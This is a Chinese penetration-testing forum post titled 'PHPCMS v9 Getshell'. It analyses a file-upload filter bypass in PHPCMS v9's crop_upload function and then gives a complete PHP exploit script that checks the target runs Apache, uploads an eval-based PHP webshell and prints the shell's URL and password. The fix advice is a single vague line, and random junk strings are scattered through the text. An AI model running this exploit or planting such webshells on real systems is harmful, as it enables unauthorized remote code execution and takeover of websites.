中国网络渗透测试联盟
标题:
PHPCMS v9 Getshell
[打印本页]
作者:
admin
时间:
2013-3-7 13:06
标题:
PHPCMS v9 Getshell
漏洞类型: 文件上传导致任意代码执行
. }4 W7 M7 O8 ?7 e& [- j
# U G1 y; I& S
简要描述:
8 l( [( z2 z/ h! J
$ m- w7 F- q5 a3 U) V
phpcms v9 getshell (apache)
! g- @# r( j4 D0 C
详细说明:
9 ?' Z4 J0 C1 o/ N
/ S2 F" b$ f1 k; `
漏洞文件:phpcms\modules\attachment\attachments.php
5 z3 T7 P/ r3 K. B: |/ x4 v# P
0 m' ^1 n9 Q, b+ t# b/ s1 U
public function crop_upload() { (isset($GLOBALS["HTTP_RAW_POST_DATA"])) { $pic = $GLOBALS["HTTP_RAW_POST_DATA"]; if (isset($_GET['width']) && !empty($_GET['width'])) { $width = intval($_GET['width']); } if (isset($_GET['height']) && !empty($_GET['height'])) { $height = intval($_GET['height']); } if (isset($_GET['file']) && !empty($_GET['file'])) { $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号 if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键 if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) { $file = $_GET['file']; $basenamebasename = basename($file);//获取带有后缀的文件名 if (strpos($basename, 'thumb_')!==false) { $file_arr = explode('_', $basename); $basename = array_pop($file_arr); } $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename; } else { pc_base::load_sys_class('attachment','',0); $module = trim($_GET['module']); $catid = intval($_GET['catid']); $siteid = $this->get_siteid(); $attachment = new attachment($module, $catid, $siteid); $uploadedfile['filename'] = basename($_GET['file']); $uploadedfile['fileext'] = fileext($_GET['file']); if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) { $uploadedfile['isimage'] = 1; } $file_path = $this->upload_path.date('Y/md/'); pc_base::load_sys_func('dir'); dir_create($file_path); $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext']; $uploadedfile['filepath'] = date('Y/md/').$new_file; $aid = $attachment->add($uploadedfile); } $filepath = date('Y/md/'); file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控 } else { return false; } echo pc_base::load_config('system', 'upload_url').$filepath.$new_file; exit; } }
2 ^: R, Q+ o1 J6 v
后缀检测:phpcms\modules\attachment\functions\global.func.php
8 s0 n- V! e1 O8 A* m
5 B+ e7 }" V$ r8 r
6 ? r; @- B) L2 I, i( L
8 S1 y) M7 i" I( U# R$ y
function is_image($file) { $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); $ext = fileext($file);关键地方 return in_array($ext,$ext_arr) ? $ext_arr :false; }
# X% O& p6 Q7 `* B9 v: ^
' x7 W( {( I0 M* i
关键函数:
9 q0 P1 a* v& P7 u
5 v$ x! `3 h1 ?3 f
- J; g. L. K; t$ }7 ~
# d$ t5 k* z% ~" m
function fileext($filename) { return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }
# I+ V1 D7 v. s+ ]6 M- c
6 \2 G7 |6 l- M X$ W7 _
Fileext函数是对文件后缀名的提取。
. T4 F" V/ G$ e( p' u b) @
根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php
& Z+ K0 y& [# u
经过此函数提取到的后缀还是jpg,因此正在is_image()函数中后缀检测被绕过了。
5 B, |9 V' [9 v/ g/ D
我们回到public function crop_upload() 函数中
) e; K- m B( | x% s% c D
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
/ O! p' |& K# J x# H4 k
在经过了is_image的判断之后又来了个.php的判断,在此程序员使用的是strpos函数
) J8 `# q) E& ^( Z9 X$ o) v8 j
这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。
. f3 I. n" B/ k. v: \, @
经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
( A2 b* a/ `7 A/ s" M3 ^
最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
6 {$ w, M- N9 D" Y: c/ L
看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀,大家应该明白了,它用在apache搭建的服务器上可以被解析。
2 {! A2 c+ V2 ]" R
漏洞证明:
' ?/ A5 U8 u! v
1 p Y- e# W% `3 J6 U
exp:
$ E c, Z. F1 @, g" m. ]
" R' s+ G9 u2 T* K) g
<?php
- G% ^' M2 o5 \0 l. g0 ~( K
error_reporting(E_ERROR);
3 O+ r7 d* s- a7 W
set_time_limit(0);
! U H% w; ]) f& C; r
$pass="ln";
% w- E5 c& x9 Y0 q+ H# W% c+ U
print_r('
' G; p7 u$ V A# M, S/ g) n
+---------------------------------------------------------------------------+
' g C' V. i! K( T& y1 j0 H
PHPCms V9 GETSHELL 0DAY
0 m$ y% X. F+ Y% _
code by L.N.
% p+ c. q8 W, W" F2 g
% A f# ]9 D4 u3 E
apache 适用(利用的apache的解析漏洞) // 云安全
www.yunsec.net
; }/ n! }: S& }
+---------------------------------------------------------------------------+
) x& R+ p) W4 _: w
');
( p7 ?( \* R, t; e, q
if ($argc < 2) {
& G2 f7 q3 l1 K. d
print_r('
7 i4 I, Q. Q' f
+---------------------------------------------------------------------------+
- f5 P, w$ d7 }6 ~; {$ q
Usage: php '.$argv[0].' url path
8 `# N+ ^* w' v6 J" Z
1 t r' }' p$ Y9 \' j
Example:
8 @+ q9 c- S. q8 x( j
1.php '.$argv[0].' lanu.sinaapp.com
6 _- ^8 X4 W1 ~/ u# z8 Y5 \
2.php '.$argv[0].' lanu.sinaapp.com /phpcms
C+ s/ Q7 @* V. u
+---------------------------------------------------------------------------+
. w7 K) D% Y& D" N' h. C
');
" ?! l2 e! {9 A
exit;
4 b- X3 y" t* B, T! b
}
6 m" k- c$ j, d% P2 H2 y% j
& [# o y+ |4 E% R v7 L( b" Y6 T- d
$url = $argv[1];
3 v9 b" F. r3 c" p$ v; N; l
$path = $argv[2];
3 P" u! ~: t3 U# Z8 w/ M. b. u, U8 x4 U
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
$ j. r" p# y+ w
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
+ J, [& v4 k% a) X( T3 _
if($ret=Create_dir($url,$path))
6 z' a4 z7 X; v' n
{
! @3 [( \$ r2 X8 {" j# K
//echo $ret;
' i' E- p( x2 z+ }. S; Z
$pattern = "|Server:[^,]+?|U";
Q5 ~# A: P+ W8 ^* K
preg_match_all($pattern, $ret, $matches);
. P) \. T! P7 Q' \7 e# P
if($matches[0][0])
1 T4 ?2 X/ E* j' h* ~2 f) S) |
{
s* T* Q v, K* m3 r
if(strpos($matches[0][0],'Apache') == false)
: S, F% n/ e. P$ v+ ^7 m
{
5 U( [5 |( W$ y3 t a
echo "\n亲!此网站不是apache的网站。\n";exit;
% [) \" O" c' K: B
}
% `0 W" U9 p2 U: i
}
$ ?. }, o b. s
$ret = GetShell($url,$phpshell,$path,$file);
( E- ^1 g2 V( T- g' B
$pattern = "|http:\/\/[^,]+?\.,?|U";
' T$ ~' W: Q% h4 U
preg_match_all($pattern, $ret, $matches);
8 B8 K9 Y$ a/ n* j) F- C# ?, g' g. N
if($matches[0][0])
, x$ n; N0 A) M' ~5 o
{
6 m/ s+ q m4 E8 S
echo "\n".'密码为: '.$pass."\n";
2 _3 }- M5 e5 h. ]% i: _
echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
( c- E% K" i1 R
}
% U' I5 A/ b, ^" s8 r) r ~
else
" [8 F3 b( M4 M. {) I
{
9 E! L) f9 v7 o" a+ k9 Q
$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
+ f; B' ^6 c% s
preg_match_all($pattern, $ret, $matches);
! _! I# c! R) X# W0 J5 y% c l
if($matches[0][0])
- q; M7 [- x/ |1 I; u
{
3 o6 _" @6 x9 N0 j3 ]
echo "\n".'密码为: '.$pass."\n";
$ s( g1 M5 B; j6 W. z
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
% C& n6 R3 I* Y# f1 a7 {& T
}
# e& Q. Q* f- A7 g' _
else
0 H ]3 L8 M4 } n& p1 P
{
( l+ y) s" ]5 e: m# F* q2 u
echo "\r\n没得到!\n";exit;
1 x- I8 A n# }; O
}
$ S9 D$ B/ b& u; \2 l( T6 D
}
1 b1 B n+ G H9 s
}
! O: U& `& l, d
0 @. U: ~; S& z* f2 `
function GetShell($url,$shell,$path,$js)
% j# m( H3 d' W, }: Y- R
{
4 v6 F! {. ` L+ I/ }
$content =$shell;
3 o7 e5 j: Q' y5 ~* J0 [0 v7 r& }+ S
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
1 ~ n% p% w) B
$data .= "Host: ".$url."\r\n";
4 c1 F4 k/ Z0 @! W8 k- W" J5 w
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$ M5 {8 O/ ^1 m4 A+ ]
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
: |7 g" `- R# B0 n8 S
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
# d& [ u* \, P4 O$ J3 S
$data .= "Connection: close\r\n";
+ N) h: g) T U* x0 `
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
6 y, k. r6 |" |) p7 k6 a+ \
$data .= $content."\r\n";
: `. u- A) N% i# S5 p' X8 O
$ock=fsockopen($url,80);
* g/ t O% K. O" y6 `, `
if (!$ock)
* R4 K4 s7 b. j, @" r" j4 W
{
4 v8 b# \: A" M
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
" R" }2 x( x) v% @1 p. r
}
# Z" n! @3 H% ~
else
: V7 q, V& r* q5 G
{
2 A" R% r' c0 y; H3 n7 u
fwrite($ock,$data);
3 Y# m; [- y+ |" e
$resp = '';
- F2 Q7 I+ Y7 T. K9 W
while (!feof($ock))
2 s9 e% d; g, C7 k6 \/ q9 a; u8 G( \, m
{
/ `7 W+ J3 \1 ^) `
$resp.=fread($ock, 1024);
2 {; O e3 q+ \
}
9 @0 s0 k0 S: i" ~
return $resp;
3 G0 ~% e. j7 v! c) T1 |
}
R2 h, j" ^2 v& l! ^9 N/ j, E# ^
}
; u5 M' ^! w$ l9 a
1 m5 f1 X# E: ]2 K
function Create_dir($url,$path='')
/ K8 ~: {. U. T7 D: I9 D
{
2 J% t1 ]/ Z+ A" z
$content ='I love you';
0 D' i3 ~9 R, ~0 P( P9 d% ]
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
, _7 B( F7 l8 ` h4 f
$data .= "Host: ".$url."\r\n";
, s0 v2 S2 x: G/ F5 o1 b" t+ l4 L
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
% V1 @' w; p& I; b9 N' e
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
# G( j3 f' e/ E% b9 n/ `
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
# e% r+ j; k+ `( I2 T! a
$data .= "Connection: close\r\n";
" `! k3 s% L7 N( d# i8 i) A
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
% t0 E/ E& @, S, @; L
$data .= $content."\r\n";
/ j+ e" i9 L3 t. w0 m$ q+ {5 W
$ock=fsockopen($url,80);
0 ?9 Y2 e, s' `
if (!$ock)
; a2 C2 {$ M0 r8 ]4 w4 h' k
{
- W( d5 j1 U8 [* @, v3 I: l( F
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
: G0 \0 j) l: b' [( I8 {
}
8 h0 ?% ?( r8 j( l1 P: A% j+ U
fwrite($ock,$data);
* r8 x$ w9 N6 e6 I
$resp = '';
" Y- F/ e& m0 D0 X; V" }
while (!feof($ock))
; b! ]9 v+ f. q2 f6 S% W
{
8 T! I+ R8 ~# J
$resp.=fread($ock, 1024);
* M; |7 Z! F3 O
}
3 E% ?. |* A0 [3 ]0 d6 p! k9 x
return $resp;
" p6 A+ U; X( }! D, n g0 b6 z
}
& ^( y) V$ ^& F! F" F( O
?>
( x, M) }- Y1 @/ T& V) d5 t- T
. z' S! p) e. a9 T* d
修复方案:
* ?7 p( \7 m1 |4 s! ~4 m' D
9 C3 q( ?, F; q7 `9 _
过滤过滤再过滤
4 @+ k; u9 O* `& A) Q0 y
. y9 f. K( }- f/ V+ ?4 J
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2